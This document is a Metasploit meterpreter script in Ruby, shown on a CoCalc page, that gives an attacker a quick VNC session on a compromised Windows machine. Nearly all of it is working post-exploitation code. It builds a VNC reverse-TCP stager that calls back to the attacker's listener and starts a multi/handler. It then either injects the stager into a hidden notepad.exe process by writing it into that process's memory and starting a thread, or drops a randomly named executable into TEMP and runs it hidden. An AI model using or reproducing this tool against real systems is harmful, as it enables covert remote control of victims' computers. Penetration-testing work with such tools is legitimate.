CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!

1
##
2
# WARNING: Metasploit no longer maintains or accepts meterpreter scripts.
3
# If you'd like to improve this script, please try to port it as a post
4
# module instead. Thank you.
5
##
6

7

8
#
9
# Meterpreter script for obtaining a quick VNC session
10
#
11

12
session = client
13

14
#
15
# Options
16
#
17
opts = Rex::Parser::Arguments.new(
18
  "-h"  => [ false,  "This help menu"],
19
  "-r"  => [ true,   "The IP of a remote Metasploit listening for the connect back"],
20
  "-p"  => [ true,   "The port on the remote host where Metasploit is listening (default: 4545)"],
21
  "-v"  => [ true,   "The local port for the VNC proxy service (default: 5900)"],
22
  "-i"  => [ false,  "Inject the vnc server into a new process's memory instead of building an exe"],
23
  "-P"  => [ true,   "Executable to inject into (starts a new process).  Only useful with -i (default: notepad.exe)"],
24
  "-D"  => [ false,  "Disable the automatic exploit/multi/handler (use with -r to accept on another system)"],
25
  "-O"  => [ false,  "Disable binding the VNC proxy to localhost (open it to the network)"],
26
  "-V"  => [ false,  "Disable the automatic launch of the VNC client"],
27
  "-t"  => [ false,  "Tunnel through the current session connection. (Will be slower)"],
28
  "-c"  => [ false,  "Enable the VNC courtesy shell"]
29
)
30

31
#
32
# Default parameters
33
#
34

35
if (client.sock and client.sock.respond_to? :peerhost and client.sock.peerhost)
36
  rhost    = Rex::Socket.source_address(client.sock.peerhost)
37
else
38
  rhost    = Rex::Socket.source_address("1.2.3.4")
39
end
40
rport    = 4545
41
vport    = 5900
42
lhost    = "127.0.0.1"
43

44

45
autoconn = true
46
autovnc  = true
47
anyaddr  = false
48
courtesy = false
49
tunnel   = false
50
inject   = false
51
runme    = "notepad.exe"
52
pay      = nil
53

54
#
55
# Option parsing
56
#
57
opts.parse(args) do |opt, idx, val|
58
  case opt
59
  when "-h"
60
    print_line(opts.usage)
61
    raise Rex::Script::Completed
62
  when "-r"
63
    rhost = val
64
  when "-p"
65
    rport = val.to_i
66
  when "-v"
67
    vport = val.to_i
68
  when "-P"
69
    runme = val
70
  when "-D"
71
    autoconn = false
72
  when "-O"
73
    anyaddr = true
74
  when "-V"
75
    autovnc = false
76
  when "-c"
77
    courtesy = true
78
  when "-t"
79
    tunnel = true
80
    autoconn = true
81
  when "-i"
82
    inject = true
83
  end
84
end
85

86
#check for proper Meterpreter Platform
87
def unsupported
88
  print_error("This version of Meterpreter is not supported with this Script!")
89
  raise Rex::Script::Completed
90
end
91
unsupported if client.platform != 'windows'
92

93
#
94
# Create the raw payload
95
#
96
if (tunnel)
97
  print_status("Creating a VNC bind tcp stager: RHOST=#{lhost} LPORT=#{rport}")
98
  payload = "windows/vncinject/bind_tcp"
99

100
  pay = client.framework.payloads.create(payload)
101
  pay.datastore['RHOST'] = lhost
102
  pay.datastore['LPORT'] = rport
103
  pay.datastore['VNCPORT'] = vport
104
else
105
  print_status("Creating a VNC reverse tcp stager: LHOST=#{rhost} LPORT=#{rport}")
106
  payload = "windows/vncinject/reverse_tcp"
107

108
  pay = client.framework.payloads.create(payload)
109
  pay.datastore['LHOST'] = rhost
110
  pay.datastore['LPORT'] = rport
111
  pay.datastore['VNCPORT'] = vport
112
end
113

114
if (not courtesy)
115
  pay.datastore['DisableCourtesyShell'] = true
116
end
117

118
if (anyaddr)
119
  pay.datastore['VNCHOST'] = "0.0.0.0"
120
end
121

122
if autoconn
123
  mul = client.framework.exploits.create("multi/handler")
124
  mul.share_datastore(pay.datastore)
125

126
  mul.datastore['WORKSPACE'] = client.workspace
127
  mul.datastore['PAYLOAD'] = payload
128
  mul.datastore['EXITFUNC'] = 'process'
129
  mul.datastore['ExitOnSession'] = true
130
  mul.datastore['WfsDelay'] = 7
131

132
  mul.datastore['AUTOVNC'] = autovnc
133

134
  print_status("Running payload handler")
135
  mul.exploit_simple(
136
    'Payload'  => mul.datastore['PAYLOAD'],
137
    'RunAsJob' => true
138
  )
139
end
140

141
raw = pay.generate
142
if (inject)
143
  #
144
  # Create a host process
145
  #
146
  pid = client.sys.process.execute("#{runme}", nil, {'Hidden' => 'true'}).pid
147
  print_status("Host process #{runme} has PID #{pid}")
148
  host_process = client.sys.process.open(pid, PROCESS_ALL_ACCESS)
149
  mem = host_process.memory.allocate(raw.length + (raw.length % 1024))
150

151
  print_status("Allocated memory at address #{"0x%.8x" % mem}, for #{raw.length} byte stager")
152
  print_status("Writing the VNC stager into memory...")
153
  host_process.memory.write(mem, raw)
154
  host_process.thread.create(mem, 0)
155
else
156
  exe = ::Msf::Util::EXE.to_win32pe(client.framework, raw)
157
  print_status("VNC stager executable #{exe.length} bytes long")
158

159
  #
160
  # Upload to the filesystem
161
  #
162
  tempdir = client.sys.config.getenv('TEMP')
163
  tempexe = tempdir + "\\" + Rex::Text.rand_text_alpha((rand(8)+6)) + ".exe"
164
  tempexe.gsub!("\\\\", "\\")
165

166
  fd = client.fs.file.new(tempexe, "wb")
167
  fd.write(exe)
168
  fd.close
169
  print_status("Uploaded the VNC agent to #{tempexe} (must be deleted manually)")
170

171
  #
172
  # Execute the agent
173
  #
174
  print_status("Executing the VNC agent with endpoint #{rhost}:#{rport}...")
175
  pid = session.sys.process.execute(tempexe, nil, {'Hidden' => true})
176
end
177

178
if tunnel
179
  # Set up a port forward for the exploit/multi/handler to use for uploading the stage
180
  print_status("Starting the port forwarding from #{rport} => TARGET:#{rport}")
181
  client.run_cmd("portfwd add -L 127.0.0.1 -l #{rport} -p #{rport} -r #{lhost}")
182
end
183

184

185